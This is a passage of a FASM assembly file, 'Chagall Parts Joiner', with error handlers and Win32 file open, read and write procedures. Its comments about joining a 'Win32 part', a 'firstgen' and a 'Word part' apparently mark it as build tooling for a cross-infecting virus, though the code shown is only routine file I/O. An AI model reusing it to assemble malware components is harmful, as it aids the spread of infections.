	jmp Exit
;*****write win32, firstgen and word part to file***************

;*****error messages********************************************
CantReadWin32Part:
	invoke MessageBox,\
	       0,\
	       "Cant read the Win32 part into buffer",\
	       "error",\
	       MB_ICONERROR
	jmp Exit

CantReadWordPart:
	invoke MessageBox,\
	       0,\
	       "Cant read the Word part into buffer",\
	       "error",\
	       MB_ICONERROR
	jmp Exit

CantCreateOutputFile:
	invoke MessageBox,\
	       0,\
	       "Cant create the output file",\
	       "error",\
	       MB_ICONERROR
	jmp Exit

CantWriteWin32Part:
	invoke MessageBox,\
	       0,\
	       "Cant write the Win32 part to the output file",\
	       "error",\
	       MB_ICONERROR
	jmp Exit

CantWriteWordPart:
	invoke MessageBox,\
	       0,\
	       "Cant write the Word part to the output file",\
	       "error",\
	       MB_ICONERROR
;*****error messages***end**************************************

Exit:
	invoke ExitProcess,\
	       0

;*****Procedures Open, Read and Write files*********************
OpenFile_:
	invoke CreateFile,\
	       ebx,\					;edx - flags (CREATE_ALWAYS...OPEN_EXISTING)
	       ecx,\					;ebx - filename to open
	       FILE_SHARE_READ + FILE_SHARE_WRITE,\	;ecx - GENERIC_READ .. GENERIC_WRITE
	       0,\
	       edx,\
	       FILE_ATTRIBUTE_NORMAL,\
	       0

	cmp eax, INVALID_HANDLE_VALUE
	jne OpenFileEnd

	mov ecx, SomethinFalse
	jmp OpenFileReturn

OpenFileEnd:
	mov ecx, 0

OpenFileReturn:
ret

ReadInBuffer:
	invoke ReadFile,\				;ebx - pointer to file handle
	       dword [ebx],\				;ecx - pointer to buffer start
	       ecx,\					;edx - size to read
	       edx,\
	       BytesRead,\
	       0

	cmp eax, 0
	jne ReadInBufferEnd

	mov ecx, SomethinFalse
	jmp ReadBufferReturn

ReadInBufferEnd:
	mov ecx, 0

ReadBufferReturn:
ret

WriteToFile:
	invoke WriteFile,\
	       dword [ebx],\				;ebx - file handle
	       edx,\					;edx - start address of buffer
	       ecx,\					;ecx - size to write
	       BytesWrite,\
	       0

	cmp eax, 0
	jne WriteToFileEnd

	mov ecx, SomethinFalse
	jmp WriteToFileReturn

WriteToFileEnd:
	mov ecx, 0

WriteToFileReturn:
ret
;*****Procedures Open, Read and Write files***end***************

.end Joiner

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall Parts Joiner -     Joiner.asm      ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;